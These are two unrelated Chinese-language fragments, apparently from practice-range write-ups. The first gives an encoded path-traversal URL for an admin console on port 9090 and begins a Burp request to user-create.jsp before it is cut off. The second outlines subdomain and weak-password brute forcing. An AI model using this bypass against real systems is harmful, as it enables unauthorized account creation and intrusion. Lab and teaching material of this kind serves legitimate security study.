首先进入靶场访问https://域名:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp出现上图所示的日志泄露即可确定漏洞存在接下来bp抓包，在重发器里填入以下数据包内容：GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=xxxxx&usernam

首先找到目标网站（子域名爆破，fafo之类的）#CTL{\n}#CTL{\n}测试弱口令爆破是否存在#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/3529/20220526/8c9f5450-a4